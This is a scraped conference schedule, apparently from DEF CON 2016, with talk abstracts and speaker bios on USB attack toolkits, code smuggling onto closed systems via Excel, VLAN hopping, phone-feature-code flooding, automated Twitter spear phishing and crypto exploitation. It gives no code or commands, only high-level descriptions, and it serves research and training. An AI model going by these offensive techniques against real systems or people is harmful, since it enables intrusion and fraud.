Jeff Kitson is a Security Researcher with the Vulnerability Assessment Team of Trustwave SpiderLabs. His career began with full-stack web development before moving into system administration and eventually vulnerability and security research. His current work includes maintaining and developing vulnerability tools within Trustwave. His research interests include IOT devices and extracting information with software defined radio.
Return to Index
BHV - Skyview 4 - Friday - 15:30-15:59
Speakers: Ryan Schmoll and Peter Hefley
About Ryan and Peter:
Ryan and Peter can each say that they were the world’s third largest nuclear power at some point in their life. They enjoy short walks along beaches lined with broken glass and broken dreams. They share experience keeping the world safe through “deterrence” and watching DirecTV for extended periods of time, well below ground, in America’s heartland. Subsequently, Peter pursued a life in penetration testing while Ryan made poor life decisions and is (still) studying to be a physician. With their blended experience in security, medicine, and an altruism that can only be gained by holding millions of lives at risk in support of vague and ever changing national security objectives, this duo is seeking to create a collaborative medical experience for patients and physicians that shatters the current paradigm.
Abstract:
Teleradiology is an $8 billion dollar a year industry and we are going to disrupt it. Medical records are critical infrastructure, and with an increasing emphasis on real-time interpretations of medical imagery to improve healthcare outcomes in emergency situations, it is imperative the systems that enable medical collaboration are secure and reliable. Here we present an Ethereum-based application that allows anyone who needs help interpreting an image to reach out to a radiologist anywhere in the world, securely, privately, without a third party intermediary, and for a lower price than existing teleradiology firms.
Return to Index
BHV - Skyview 4 - Friday - 15:30-15:59
Speakers: Ryan Schmoll and Peter Hefley
About Ryan and Peter:
Ryan and Peter can each say that they were the world’s third largest nuclear power at some point in their life. They enjoy short walks along beaches lined with broken glass and broken dreams. They share experience keeping the world safe through “deterrence” and watching DirecTV for extended periods of time, well below ground, in America’s heartland. Subsequently, Peter pursued a life in penetration testing while Ryan made poor life decisions and is (still) studying to be a physician. With their blended experience in security, medicine, and an altruism that can only be gained by holding millions of lives at risk in support of vague and ever changing national security objectives, this duo is seeking to create a collaborative medical experience for patients and physicians that shatters the current paradigm.
Abstract:
Teleradiology is an $8 billion dollar a year industry and we are going to disrupt it. Medical records are critical infrastructure, and with an increasing emphasis on real-time interpretations of medical imagery to improve healthcare outcomes in emergency situations, it is imperative the systems that enable medical collaboration are secure and reliable. Here we present an Ethereum-based application that allows anyone who needs help interpreting an image to reach out to a radiologist anywhere in the world, securely, privately, without a third party intermediary, and for a lower price than existing teleradiology firms.
Return to Index
DEFCON - Track Two - Saturday - 14:00-14:59
Universal Serial aBUSe: Remote Physical Access Attacks
Rogan Dawes Researcher, Sensepost
Dominic White CTO, SensePost
In this talk, we’ll cover some novel USB-level attacks, that can provide remote command and control of, even air-gapped machines, with a minimal forensic footprint, and release an open-source toolset using freely available hardware.
In 2000, Microsoft published its 10 Immutable laws of security [1]. One of which was "if a bad guy has unrestricted access to your computer, it's not your computer anymore." This has been robustly demonstrated over the years. Examples include numerous DMA-access attacks against interfaces such as firewire [2], PCMCIA and thunderbolt [3] as well as USB-based attacks including simple in-line keyloggers, "evil maid" attacks [4] and malicious firmware [5].
Despite these warnings, groups such as the NSA were still able to use physical access to bypass software controls with toolsets such as COTTONMOUTH [6]. Likewise, criminals have been able to defraud banks with a handful of simple hardware tricks [7]. While some progress has been made to secure some devices against some threats, such as the use of full disc encryption, or the impact of Apple's secure enclave in the physical security of the iPhone [8], most laptops and desktops remain vulnerable to attacks via physical interfaces.
In our experience, organisations merely view USB devices as a channel for malware or unsanctioned communications, and rely on protections placed elsewhere in their defensive stack to deal with them, but few deal with the risk the USB interface presents directly. There are many scenarios where gaining physical access to hosts is plausible [9], and having done so can provide access to "chewy" internal networks [10] ripe for lateral movement.
While most people are familiar with USB devices, many don't realise the extent to which the USB standard allows seemingly innocuous devices to have multiple personalities. There has been an extensive amount of research into malicious USB devices, such as TURNIPSCHOOL [15], GoodFET/Facedancer [16], Shikra [17], Rubber Ducky [11], USBdriveby [12] and BadUSB [5]. However, none of these implement an end-to-end attack either because that was not their intention, they only focus on a part of the attack or the project was never completed.
Additionally, existing attacks are predominantly "send only" with no built-in bidirectional communications. They usually rely on the executed payload and the host’s networks for any advanced remote access. Thus, these payloads can leave a significant forensic footprint in the form of network communications and on-host behaviours, and leave them vulnerable to anti-malware controls. Numerous companies are improving toolsets to detect such attacks [13][14]. Lastly, these attacks are often "spray and pray", unable to account for variations in the user's behaviour or computer setup.
Our approach is to create a stealthy bi-directional channel between the host and device, with remote connectivity via 3G/Wi-Fi/Bluetooth and offload the complexity to our hardware, leaving a small simple stub to run on the host. This talk will discuss the process of creating a set of malicious USB devices using low cost hardware. The design and toolkit will be released during the talk.
Our toolkit provides three significant improvements over existing work. The first is the ability to gain a stealthy bi-directional channel with the host via the device. No traffic is generated on the target network (i.e it would work against air-gapped hosts). This is done via the use of either a raw HID device or standard USB class printer driver linked to our device, with the stub merely wrapping commands and their output to our device. The second is the ability to communicate with the device remotely via Wi-Fi/3G/Bluetooth, allowing for updates to the payloads, exfiltration of data, real-time interaction with the host and an ability to debug problems. This also has the advantage that any network controls are bypassed. Finally, the stub running on the host will leave a minimal forensic trail, making detection of the attack, or analysis of it later, difficult. For completeness sake, a new transport for metasploit was developed to allow metasploit payloads to be used instead.
Our hope is that the tools will provide a method of demonstrating the risk of physical bypasses of software security without an NSA budget, and encourage defences to be built in this area.
[1] "10 Immutable Laws of Security" https://technet.microsoft.com/library/cc722487.aspx
[2] "Physical memory attacks via Firewire/DMA - Part 1: Overview and Mitigation" https://web.archive.org/web/20160304055745/http://www.hermann-uwe.de/blog/physical-memory-attacks-via-firewire-dma-part-1-overview-and-mitigation
[3] "Thunderstrike 2" https://trmm.net/Thunderstrike_2
[4] "Evil Maid goes after TrueCrypt!" http://theinvisiblethings.blogspot.co.za/2009/10/evil-maid-goes-after-truecrypt.html
[5] "Turning USB peripherals into BadUSB" https://srlabs.de/badusb/
[6] "Your USB cable, the spy: Inside the NSA’s catalog of surveillance magic" http://arstechnica.com/information-technology/2013/12/inside-the-nsas-leaked-catalog-of-surveillance-magic/
[7] "How bank hackers stole £1.25 million with a simple piece of computer hardware" https://www.grahamcluley.com/2014/04/bank-hackers-hardware/
[8] "Apple vs FBI" https://www.apple.com/customer-letter/
[9] "Users Really Do Plug in USB Drives They Find" https://zakird.com/papers/usb.pdf
[10] "The Design of a Secure Internet Gateway" http://www.cheswick.com/ches/papers/gateway.pdf
[11] "USB Rubber Ducky Wiki" http://usbrubberducky.com/
[12] "USBDriveBy" http://samy.pl/usbdriveby/
[13] "Cylance, Math vs Malware" https://cdn2.hubspot.net/hubfs/270968/All_Web_Assets/White_Papers/MathvsMalware.pdf
[14] "Carbon Black, Next Generation Endpoint Security" https://www.carbonblack.com/wp-content/uploads/2016/03/2016_cb_wp_next_gen_endpoint_security_small.pdf
[15] "NSA Playset, TURNIPSCHOOL" http://www.nsaplayset.org/turnipschool
[16] "Facedancer2" http://goodfet.sourceforge.net/hardware/facedancer21/
[17] "The Shikra" http://int3.cc/products/the-shikra
Rogan Dawes is a senior researcher at SensePost and has been hacking since 1998, which, coincidentally, is also the time he settled on a final wardrobe. He used the time he saved on choosing outfits to live up to his colleague’s frequent joke that he has an offline copy of the Internet in his head. Rogan spent many years building web application assessment tools, and is credited as having built one of the first and most widely used intercepting proxies; WebScarab. In recent years, Rogan has turned his attentions towards hardware hacking; and these days many suspect him to be at least part cyborg. A good conversation starter is to ask him where he keeps his JTAG header.
Dominic White is the CTO of SensePost, an information security company based in South Africa and London. He has worked in the industry for 12 years. He tweets as @singe.
Return to Index
SE - Palace 2-5 - Friday - 19:00-19:55
Return to Index
Workshops - Las Vegas Ballroom 5 - Thursday - 15:00-19:00
Use Microsoft Free Security Tools as a Ninja
Simon Roses CEO, Vulnex
Microsoft has published a great deal of free security tools for developers and IT Pros that are widely unknown. This hands-on lab will introduce you to some of these tools and how they can be used to improve your end game: better security for your products and enterprise.
For developers we have all kinds of security tools that can be used across the entire SDLC to create secure software, and for IT Pros we have a bunch of tools to analyze and secure desktops and servers easily and faster.
This hands-on workshop contains a lot of demos covering topics such as:
- Threat Modeling
- Static analysis of C/C++ and .NET code
- Binary analysis
- Fuzzing applications
- System Attack Surface analysis
- Insecure configurations and vulnerabilities scanning
- Malware Scanning
- Desktop and Server hardening
Some of the tools are Windows focused, but others are technology agnostic so they can be used for other technologies as well.
Whatever you are a developer, a sysadmin or an infosec guy, there is something for you! By the end of the workshop, you will have learned some free and cool tools you can use right away.
It is time to step up your security game!
Simon Roses holds a B.S. from Suffolk University (Boston), Postgraduate in E-Commerce from Harvard University (Boston) and Executive MBA from IE Business School (IE, Madrid).
Currently is the CEO at VULNEX, driving security innovation. Former Microsoft, PriceWaterhouseCoopers and @Stake.
Simon has authored and cooperated in several security Open Source projects like OWASP Pantera and LibExploit. He has also published security advisories in commercial products.
He was awarded a DARPA Cyber Fast Track (CFT) grant to research on software security.
Frequent speaker at security industry events including BLACK HAT, RSA, HITB, OWASP, AppSec, SOURCE. DeepSec and Microsoft Security Technets. CISSP, CEH & CSSLP
Blog: www.simonroses.com
Max Class Size: 55
Prerequisites for students: Basic Windows skills
Materials or Equipment students will need to bring to participate: Students must bring a laptop with a Windows 7 virtual image (recommended) or later (Windows 10). Note: Administrator permission is required to install some of the tools.
Return to Index
DEFCON - Track Three - Sunday - 11:00-11:59
Use Their Machines Against Them: Loading Code with a Copier
Mike Principal Cyber Security Engineer, The MITRE Corporation
We've all worked on ‘closed systems’ with little to no direct Internet access. And we've all struggled with the limitations those systems put on us in the form of available tools or software we want to use. I didn't like struggling, so I came up with a method to load whatever I wanted on to a closed system without triggering any common security alerts. To do this I had to avoid accessing the Internet or using mag media. In the end all I needed was an office multi-function machine and Excel. It's all any insider needs.
For my presentation and demo, I'll show you how I delivered a select group of PowerSploit tools to a clean, isolated machine. Of course, Excel has been known as vector for macro viruses for quite some time and some of the techniques--such as hex-encoding binary data and re-encoding it on a target machine--are known binary insertion vectors but I have not found any prior work on an insider using these techniques to deliver payloads to closed systems. You'll leave my presentation knowing why Excel, umm, excels as an insider attack tool, how to leverage Excel features to load and extract arbitrary binary data from a closed network, and what to do if this really frightens you.
Mike has over 20 years experience in the military. He has been part of everything from systems acquisition, to tactical intelligence collection, to staff work, to leading a unit dedicated to data loss prevention. He recently retired from active military service and is now working as a systems security engineer. This is Mike's first security conference presentation and will also be the first public release of a tool he has written. Mike has previously published twice in 2600 magazine. Mike is super proud of his OSCP certification. He's also a CISSP.
Twitter: @miketofet
Return to Index
WOS - Skyview 6 - Friday - 17:10-17:59
Verifying IPS Coverage Claims: Here's How
Garett Montgomery, Security Team Lead: Application and Threat Intelligence Research Center (ATIRC) at Ixia
IPS devices are now an accepted, integral part of a defense-in-depth InfoSec strategy; by strategically positioning them on the network, attacks can be blocked before they ever reach their intended targets. But with the explosion of public exploits, polymorphic malware and an ever-increasing attack surface, how can IPS devices keep up? They all seem to have heuristic detection capabilities, which are supposed to protect you from unknown exploits, and frequent updates to protect against known vulnerabilities. But just how effective are those defenses? Sure, you can check out the Gartner magic quadrant or pay for the latest NSS Test report. Just because an IPS claims to protect you from a vulnerability doesn'tmean thats the case. In this talk, I'll talk about some of the strengths and weakness of IPS devices, as well entire classes of exploits that cause serious problems for IPS devices. While I happen to work for a company sells a very expensive device for testing IPS devices (which is where the data and my opinions come from), I plan to focus on how the same testing methodologies can be applied and the results can be duplicated using open-source tools.
Garett Montgomery (Twitter: @garett_monty) is Security Team Lead at Ixia's ATI Research Center, where the primary focus is on simulating attacker behaviors in order to provide realistic test scenarios for network-based protection devices. He has been simulating network-based attacks for BreakingPoint/Ixia for the last 4 years. Prior to joining BreakingPoint in 2012 he spent 2 years as a Research Engineer at TippingPoint/HP Enterprise Security. Before TippingPoint, he spent 9 years in the Navy, with last 3+ as a Security Analyst for the Naval Postgraduate School in Monterey, CA. He holds a Masters Degree in Information Assurance, as well as an active CISSP certifications (multiple others having long since lapsed).
Return to Index
BHV - Skyview 4 - Friday - 17:00-17:59
Speaker: Melanie Stegman, Ph.D.
@MelanieAnnS
About Melanie Stegman:
I left my post doc in biochemistry and microbiology to manage the Immune Attack project at the Federation of American Scientists. The game Immune Attack introduces receptors, clouds of cytokines, cytokinesis, and receptor mediated phagocytosis. The game pulls players into the world of cell to cell signaling and molecular immunology. The game was intended to teach basic cellular immunology to college students. However, I felt that Immune Attack could teach molecular cell biology and teach it to younger students.
I created a multiple choice test of molecular and cellular immunology based on the game. I also showed players complex molecular biology images from Nature Immunology Reviews and asked them, “Do you think you could understand this?” Immune Attack students clearly learned molecular immunology and clearly gained confidence in their ability to understand related diagrams (Stegman, 2014). Based on this research, I designed a sequel game, Immune Defense.
I am the chair of the DC chapter of the International Game Developer Association (IGDA). I attend regional and national game developer conferences and my game Immune Defense has been accepted in many competitive commercial game expos. I play a lot of video games. A wide range of audiences are interested in my work: I spoke at national meetings for the Association of Medical Illustrators, the National Science Teachers Association, the Serious Play Conference, Games Society and Learning, and the American Society for Cell Biology.
My intense time as a “post doc” in serious game design and development has taught me many important skills: 1. How to tease out the core elements of concepts and create an engaging game mechanism. 2. How to present ideas to and collaborate with programmers, artists and other game development professionals. 3. How to playtest and iterate the game so that it is fun and intuitive for players. I have an in depth understanding of the principles of biochemistry and cell biology, the creative vision to produce interactive Technology that presents these principles and experience testing iterative game designs for effectiveness.
Abstract:
I am sure that many of you have wished you had an primer for cellular and molecular biology. You could hand this primer to your friends and say, just check this out! Then your friends could understand better what your biohacking is all about. I made a video game that serves as this primer (Immune Defense). Then I made a site for all kinds of science games: ScienceGameCenter.org
Stories and games can make complex concepts common knowledge. If you doubt that games can teach such complex things, go read the Wikipedia page for The Legend of Zelda Ocharina of Time. After trying to stagger through all that data, ask 3 random people how to outsmart a Deku shrub and one of them will know right away. You know how to kill a zombie, you understand the difference between a shotgun and a rifle in a game… You could learn the difference between a positron and a helium atom, how to do Punnet squares. You can even play games that create data, like Fold It, Eye Wire, Phyllo… There is even a game call Hero Coli, that uses biobricks to give a heroic e coli new traits.
I will discuss what makes a game a well designed game, why that also proteins to science games and how a few games in particular do an excellent job at teaching abstract, complex fundamental concepts.
Return to Index
Demolabs - Table 5 - Saturday - 14:00-15:50
VirusTotalego
Christian Heinrich
Karl Hiramoto
VirusTotal is a free service that analyzes suspicious files and URLs
and facilitates the quick detection of viruses, worms, trojans, and
all kinds of malware.
Maltego performs link analysis of actionable Open Source INTelligence (OSINT)
A set of Maltego Remote/TDS Transforms have been created which
integrate with the VirusTotal's Public and Private APIs.
Christian Heinrich has presented at the OWASP Conferences in
Australia, Europe and USA, ToorCon (USA), Shmoocon (USA), BlackHat
(USA and Asia), SecTor (Canada), CONFidence (Europe), Hack In The Box
(Europe), SyScan (Singapore), RUXCON (Australia), and AusCERT
(Australia). Christian Heinrich has published Maltego Transforms for
@haveibeenpwned and Taia Global, Inc that are available for free on
the Transform Hub.
Karl Hiramoto has been working at VirusTotal for about two years. In
that time he's worked on open source code available on github:
(https://github.com/VirusTotal), working with partners, development of
in house tools, and Mac OSX sandbox
(http://blog.virustotal.com/2015/11/virustotal-mac-os-x-execution.html)
work. Prior to joining VirusTotal, Karl worked, on big data mining,
and embedded linux systems. www.linkedin.com/in/karlhiramoto
Return to Index
Demolabs - Table 4 - Saturday - 16:00-17:50
Visual Network and File Forensics using Rudra
Ankur Tyagi
Rudra aims to provide a developer-friendly framework for exhaustive analysis of pcap files (later versions will support more filetypes). It provides features to scan pcaps and generates reports that include pcap's structural properties, entropy visualization, compression ratio, theoretical minsize, etc. These help to know type of data embedded in network flows and when combined with flow stats like protocol, Yara and shellcode matches eventually help an analyst to quickly decide if a test file deserves further investigation.
Ankur Tyagi is a research engineer at Qualys Inc., where he analyzes malicious code and applies statistical modelling to identify suspicious patterns and evolving trends. His research interests include developing algorithms and analysis tools that apply stochastic and machine learning models for classifying large collections of uncategorized samples. He has completed MS in Software Systems with focus on Applied Security from BITS-Pilani. Contact him at 7h3rAm@gmail.com.
Return to Index
DEFCON - Track Three - Sunday - 14:00-14:59
VLAN hopping, ARP Poisoning and Man-In-The-Middle Attacks in Virtualized Environments
Ronny Bull Assistant Professor of Computer Science, Utica College & Ph.D. Candidate, Clarkson University
Dr. Jeanna N. Matthews Associate Professor of Computer Science, Clarkson University
Ms. Kaitlin A. Trumbull Undergraduate CS Research Assistant, Utica College
Cloud service providers offer their customers the ability to deploy virtual machines in a multi-tenant environment. These virtual machines are typically connected to the physical network via a virtualized network configuration. This could be as simple as a bridged interface to each virtual machine or as complicated as a virtual switch providing more robust networking features such as VLANs, QoS, and monitoring. At DEF CON 23, we presented how attacks known to be successful on physical switches apply to their virtualized counterparts. Here, we present new results demonstrating successful attacks on more complicated virtual switch configurations such as VLANs. In particular, we demonstrate VLAN hopping, ARP poisoning and Man-in-the-Middle attacks across every major hypervisor platform. We have added more hypervisor environments and virtual switch configurations since our last disclosure, and have included results of attacks originating from the physical network as well as attacks originating in the virtual network.
Mr.Bull is an Assistant Professor of Computer Science at Utica College with a focus in computer networking and cybersecurity. He is also a Computer Science Ph.D. candidate at Clarkson University focusing on Layer 2 network security in virtualized environments. Ronny earned an A.A.S. degree in Computer Networking at Herkimer College in 2006 and completed both a B.S. and M.S. in Computer Science at SUNYIT in 2011. He also co-founded and is one of the primary organizers of the Central New York Intercollegiate Hackathon event which brings together cybersecurity students from regional colleges to compete against each other in offensive and defensive cybersecurity activities.
Dr. Matthews is an Associate Professor of Computer Science at Clarkson University. Her research interests include virtualization, cloud computing, computer security, computer networks and operating systems. Jeanna received her Ph.D. in Computer Science from the University of California at Berkeley in 1999. She is currently the co-editor of ACM Operating System Review and a member of the Executive Committee of US-ACM, the U.S. Public Policy Committee of ACM. She is a former chair of the ACM Special Interest Group on Operating Systems (SIGOPS). She has written several popular books including Running Xen: A Hands-On Guide to the Art of Virtualization and Computer Networking: Internet Protocols In Action.
Miss Trumbull is an undergraduate student at Utica College working on her bachelors degree in Computer Science with a concentration in computer and network security. She is also an officer of the Utica College Computer Science club (a.k.a. The UC Compilers). Kaitlin is currently working as an undergraduate research assistant to Professor Bull.
Return to Index
Workshops - Las Vegas Ballroom 3 - Friday - 10:00-14:00
VoIP Wars: The Live Workshop
Fatih Ozavci Managing Consultant, Context Information Security
VoIP attacks have evolved, and are targeting Unified Communications (UC), commercial services, hosted environment and call centers, using major vendor specific and protocol vulnerabilities. This workshop is designed to experience these cutting edge VoIP attacks, and improve the VoIP skills of the incident response teams, penetration testers and network engineers. Modern attack vectors and broad threats against the VoIP ecosystem will be discussed and analyzed for major vendor and protocol vulnerabilities with references to their targets.
In this hands-on workshop, the participants will learn about Unified Communications security fundamentals and testing with practical attacks to improve their skills. Attack scenarios will be discussed for various types of UC implementations to cover business services such as call centers, service operator networks and cloud services. In addition, participants will be provided with the workshop and exercises notes as well as a USB stick that includes virtual machines and software to be used during workshop. The workshop exercises will be conducted using the open source tools and Viproy VoIP penetration testing kit developed by the trainer.
Fatih Ozavci is a Managing Consultant with Context Information Security and the author of the Viproy VoIP Pen-Test Kit, Viproxy MITM analyser and the VoIP Wars research series. He has fifteen years extensive experience in the field of information security as a leading security consultant, researcher and instructor.
His current research is focused on securing IMS and UC services, IPTV systems, mobile applications, mobility security testing, hardware hacking and BYOD/MDM analysis. He has discovered previously unknown (zero-day) security vulnerabilities and design flaws in IMS, Unified Communications, Embedded Devices, MDM, Mobility and SAP integrated environments and has published several security advisories for SAP Netweaver, Clicksoft Mobile, Cisco CUCM/CUCDM and Microsoft Skype for Business platforms.
Fatih has previously presented at major security conferences such as Blackhat Europe’15, HITB Singapore 2015, BlackHat USA’14, DEF CON 22 and 21, Troopers’15, Cluecon 2013 and Ruxcon 2013. He has provided VoIP and Mobility Security training at DEF CON 23, AustCert 2014 and 2016, Kiwicon 2015 and Troopers’15.
Homepage (personal) : http://viproy.com/fozavci
Homepage (corporate) : http://www.contextis.com.au
Linkedin : https://au.linkedin.com/in/fozavci
Max Class Size: 55
Prerequisites for students: None
Materials or Equipment students will need to bring to participate: For the live exercises, the participants should have a laptop which can run 2 VMware Virtual Machines at the same time. The exercises VMs may require at least 2GB memory. (The VM images will be provided by the tutor).
Return to Index
DEFCON - DEF CON 101 - Sunday - 11:00-11:59
Vulnerabilities 101: How to Launch or Improve Your Vulnerability Research Game
Joshua Drake VP of Platform Research and Exploitation, Zimperium
Steve Christey Coley Principal INFOSEC Engineer, MITRE
If you’re interested in vulnerability research for fun or profit, or if you’re a beginner and you’re not sure how to progress, it can be difficult to sift through the firehose of technical information that’s out there. Plus there are all sorts of non-technical things that established researchers seem to just know. There are many different things to learn, but nobody really talks about the different paths you can take on your journey. We will provide an overview of key concepts in vulnerability research, then cover where you can go to learn more - and what to look for. We’ll suggest ways for you to choose what you analyze and provide tools and techniques you might want to use. We’ll discuss different disclosure models (only briefly, we promise!), talk about the different kinds of responses to expect from vendors, and give some advice on how to write useful advisories and how to go about publishing them. Then, we’ll finish up by covering some of the ‘mindset’ of vulnerability research, including skills and personality traits that contribute to success, the different stages of growth that many researchers follow, and the different feelings (yes, FEELINGS) that researchers can face along the way. Our end goal is to help you improve your chances of career success, so you can get a sense of where you are, where you want to go, and what you might want to do to get there. We will not dig too deeply into technical details, and we’d go so far as to say that some kinds of vulnerability research do not require deep knowledge anyway. Vulnerability research isn’t for everyone, but after this talk, maybe you’ll have a better sense of whether it’s right for you, and what to expect going forward.
Joshua J. Drake is the VP of Platform Research and Exploitation at Zimperium Enterprise Mobile Security and lead author of the Android Hacker's Handbook. Joshua focuses on original research such as reverse engineering and the analysis, discovery, and exploitation of security vulnerabilities. He has over 10 years of experience researching and exploiting a wide range of application and operating system software with a focus on Android since early 2012. In prior roles, he served at Accuvant Labs, Rapid7's Metasploit, and VeriSign's iDefense Labs. Joshua previously spoke at Black Hat, DEF CON , RSA, CanSecWest, REcon, Ruxcon/Breakpoint, Toorcon, and DerbyCon. Other notable accomplishments include; helping spur mobile ecosystem change in 2015, exploiting Oracle's JVM at Pwn2Own 2013, exploiting the Android browser via NFC with Georg Wicherski at Black Hat USA 2012, and winning DEF CON 18 CTF with ACME Pharm in 2010.
Twitter: @jduck
Steve Christey Coley is a Principal Information Security Engineer in the Cyber Security Division at The MITRE Corporation, supporting FDA CDRH on medical device cyber security. Steve was co-creator and Editor of the CVE list and chair of the CVE Editorial Board from 1999 to 2015. He is the technical lead for CWE, the Common Weakness Scoring System (CWSS), and the CWE/SANS Top 25 Software Most Dangerous Software Errors. He was a co-author of the influential ‘Responsible Vulnerability Disclosure Process’ IETF draft with Chris Wysopal in 2002. He was an active contributor to other community-oriented efforts such as CVSS, CVRF, and NIST's Static Analysis Tool Exposition (SATE). His interests include adapting traditional IT security methodologies to new areas, software assurance, improving vulnerability information exchange, and making the cybersecurity profession more inclusive for anybody who seeks a place in it. He holds a B.S. in Computer Science from Hobart College.
Twitter: @sushidude
Return to Index
Workshops - Las Vegas Ballroom 2 - Saturday - 14:00-18:00
Vulnerability Assessment & Exploitation of Crypto-Systems : A Bottom up Approach
Ajit Hatti Security Researcher
This is a unique workshop on "Vulnerability Assessment & Exploitation of Crypto-Systems". In this course, instead of taking the regular flaws in crypto-implementations or popular attacks from past, we will take a holistic approach. Build strong understanding of the crypto-subsystems, their inherent security issues and how to discover, exploit and remediate them all in Flat-4-Hours.
This workshop takes the participants to next level of practical crypto-assessment and exploitation. With deeper understanding of crypto-systems, plenty of hands on vulnerability assessments and exploitation using Openssl and Open source tools and my custom scripts, participants will learn the important concepts which they can apply in real world RedTeam Pentesting or BlueTeam Defending, assessments & audits of crypto implementations.
The workshop starts with a dive into the crypto systems present on participant’s own (virtual) machine. Taking a bottom up approach, we start form of Hardware Modules, Firmware, Crypto-Libraries, Network services & we will go all the way up to applications, trust/key stores, understanding the role of each layer in cryptography, test for quality + vulnerabilities and exploit them.
Some of the unique modules covered in the workshop are testing the quality of numbers generated from RNGs & PRNGs from various sources, Extracting prime numbers from the Private keys, DH parameters, Secrete keys and testing for backdoors (Number Fixation), quality of randomness, Safety parameters (like Sofie German Test). And as we go upwards we will search and steal the insecure keys for network hopping like APT/malwares, pin rogue certificates, bypass HSTS checks to steal cookies, exploit certificate switching, Look for Seeds used in PRNG functions, re-usage of keys and flaws in SCEP implementations. And we top it up with the popular named Attacks from HEARTBLEED to LOGJAM and other popular CVEs.
I will be sharing numerous scripts written by me and open source tools which participants can use to test or automate the assessment of their own crypto-systems.
Workshop is best suited for pen-testers, developers, security engineers, auditors, compliance consultants in general but a must for those who deal with products or services involving cryptography and PKI implementations. The contents + flow of the workshop is well structured to accommodate participants from beginner to advanced level of competence.
Ajit is a founder of "SECURITY MONX" & author of LAMMA project, an Open Source Initiative to - improve security of Crypto Implementations & - better consume Cyber Threat Intelligence, which also is his primary area of research.
Currently Ajit is Principle consultant (Cryptography & System Security) with Payatu Technologies. He has worked as a Security Researcher with Symantec, Emerson, IBM, Bluelane Technologies in past & has presented his research at BlackHat, Defcon-CnPV & Nullcon.
Ajit is also a co-founder of "null Open Security Community", a hardcore volunteer and contributor through the community efforts of Null, Nullcon, SecurityTube.net & BSidesLV. Ajit is also a Marathon Runner and Organizes "World Run By Hackers" during these conferences.
Max Class Size: 55
Prerequisites for students:
- Basic understanding of Cryptographic schemes.
- High level Knowledge of application, system security.
- Basic understanding of Encryption, Hashing schemes, Digital Certificates.
Materials or Equipment students will need to bring to participate: Laptop with Openssl installed
Return to Index
DEFCON - DEF CON 101 - Thursday - 13:00-13:59
Weaponize Your Feature Codes
Nicholas Rosario (MasterChen),
VoIP Administrator
Almost everyone is familiar with feature codes, also known as star codes, such as *67 to block caller ID or *69 to find out who called you last. What if the feature codes could be used as a weapon? Caller ID spoofing, tDOSing (Call flooding), and SMS flooding are known attacks on phone networks, but what happens when they become as easy to launch as dialing *40?
Weaponize Your Feature Codes will first take the audience through a brief history of feature codes and common usage, and then demonstrate the more nefarious applications. The presentation will share the Asterisk code used to implement these "rogue" features, and mention possible ways of mitigation. While this talk builds upon previous work from the author, referenced in past DEF CON presentations, the new code written makes carrying out such attacks ridiculously easy
Nicholas RosarioMasterChen, is currently a VoIP Administrator. He has been published in 2600: The Hacker Quarterly twice for his research on the Asterisk PBX system and has given presentations at BSides Las Vegas and the DEF CON 303 Skytalks. His most recent research blends technology with psychological principles. MasterChen is an active member of the SYNShop hacker space in Las Vegas, NV and a co-founder and host of the weekly GREYNOISE infosec podcast.
Twitter: @chenb0x
Instagram: @chenb0x
website
Return to Index
DEFCON - Track One - Saturday - 14:00-14:59
Weaponizing Data Science for Social Engineering: Automated E2E Spear Phishing on Twitter
Delta Zero (John Seymour) Data Scientist, ZeroFOX
KingPhish3r (Philip Tully) Senior Data Scientist, ZeroFOX
Historically, machine learning for information security has prioritized defense: think intrusion detection systems, malware classification and botnet traffic identification. Offense can benefit from data just as well. Social networks, especially Twitter with its access to extensive personal data, bot-friendly API, colloquial syntax and prevalence of shortened links, are the perfect venues for spreading machine-generated malicious content. We present a recurrent neural network that learns to tweet phishing posts targeting specific users. The model is trained using spear phishing pen-testing data, and in order to make a click-through more likely, it is dynamically seeded with topics extracted from timeline posts of both the target and the users they retweet or follow. We augment the model with clustering to identify high value targets based on their level of social engagement such as their number of followers and retweets, and measure success using click-rates of IP-tracked links. Taken together, these techniques enable the world's first automated end-to-end spear phishing campaign generator for Twitter.
John Seymour is a Data Scientist at ZeroFOX, Inc. by day, and Ph.D. student at University of Maryland, Baltimore County by night. He researches the intersection of machine learning and InfoSec in both roles. He's mostly interested in avoiding and helping others avoid some of the major pitfalls in machine learning, especially in dataset preparation (seriously, do people still use malware datasets from 1998?) He has spoken at both DEF CON and BSides, and aims to add BlackHat USA and SecTor to the list in the near future.
Twitter: @_delta_zero
Philip Tully is a Senior Data Scientist at ZeroFOX, a social media security company based in Baltimore. He employs natural language processing and computer vision techniques in order to develop predictive models for combating threats emanating from social media. His pivot into the realm of infosec is recent, but his experience in machine learning and artificial neural networks is not. Rather than learning patterns within text and image data, his previous work focused on learning patterns of spikes in large-scale recurrently connected neural circuit models. He is an all-but-defended computer science PhD student, in the final stages of completing a joint degree at the Royal Institute of Technology (KTH) and the University of Edinburgh.
Twitter: @phtully
Return to Index
Demolabs - Table 6 - Saturday - 14:00-15:50
WebSec: a cross platform large scale vulnerability scanner
Dragos Boia
This demo shows the architecture and implementation details for WebSec, a dynamically scalable system that benefits from a modular architecture that allows scalability to millions of endpoints that can be receiving hundreds of tests. WebSec addresses the need of scaling up to test multiple sites, including some of those with the top traffic and largest attack surfaces on the Internet (like Bing and MSN) and also identifying vulnerabilities in connected applications that make use of online services for their functionality.
Dragos Boia is currently a Senior Software Engineer for Microsoft. Has almost 2 decades of experience in designing and building software. His experience range from security, machine learning, big data to distributed systems. Currently focusing more on security and distributing systems. He holds several patents. He has a B.Sc and a M.Sc in Math/Computer Science from the University of Bucharest in Romania.
Return to Index
BHV - Skyview 4 - Saturday - 10:00-10:59
Speaker: Staff
Return to Index
BHV - Skyview 4 - Saturday - 10:00-10:59
Speaker: Staff
Return to Index
BHV - Skyview 4 - Friday - 10:00-10:59
Speaker: Staff
Return to Index
BHV - Skyview 4 - Friday - 10:00-10:59
Speaker: Staff
Return to Index
BHV - Skyview 4 - Sunday - 11:00-11:59
Speaker: Staff
Return to Index
BHV - Skyview 4 - Sunday - 11:00-11:59
Speaker: Staff
Return to Index
SkyTalks - Skyview 3 - Sunday - 09:00-09:59
Speakers: Mike Raggo, Chet Hosmer
Talk: Whats Lurking Inside MP3 Files That Can Hurt You?
This session will dive into the details of MP3 files examining the potential covert and overt contents that they harbor. MP3 and more specifically the ID3 header of MP3 files contain a data structure that contains a massive set of data to satisfy the appetite of the most ardent music enthusiast, but these same contents also pose a nightmare for those tasked with uncovering covert communications and hidden content. In addition, the talk will dive into the digital rights management capabilities of MP3/ID3 to assess whether